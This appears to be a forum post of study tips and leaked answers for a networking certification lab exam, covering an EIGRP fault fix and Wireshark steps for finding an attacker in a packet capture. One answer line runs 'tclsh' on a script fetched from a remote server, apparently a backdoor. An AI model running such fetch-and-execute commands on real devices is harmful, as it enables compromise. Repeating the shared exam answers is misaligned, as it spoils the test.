正文
I don't recommend to memorize each solution. I suggest to watch the TS videos to know how to approach each scenarios, understand the topology and practise all TS labs.
All the faults on my exam was included in Spoto's workbook except:
Question3 (EIGRP) - If you look at it there's no problem with it. R11 is load balancing R14's loopback on both R11 and R13, but if you look closely on the given output, the metric doesnt match. The solution is to set "metric weights 0 1 1 1 1 1" on R11, R12, R13 and R14.
================
Diagnostics - H3
================
Same as Spoto's workbook.
- Use "bootp", the first frame with IP address 0.0.0.0 is the answer. It is not 113 or 114 on my exam, it is 133.
- Use "tcp.port==1337" or "http.request.method" to get the attacker and server IPs.
if you use "tcp.port==1337", source is attacker's IP and destination is server's IP.
if you use "http.request.method", source is server's IP and destination is attackers' IP
- "tclsh http://x.x.x.x/bd2.tcl" where x.x.x.x is the server's IP.
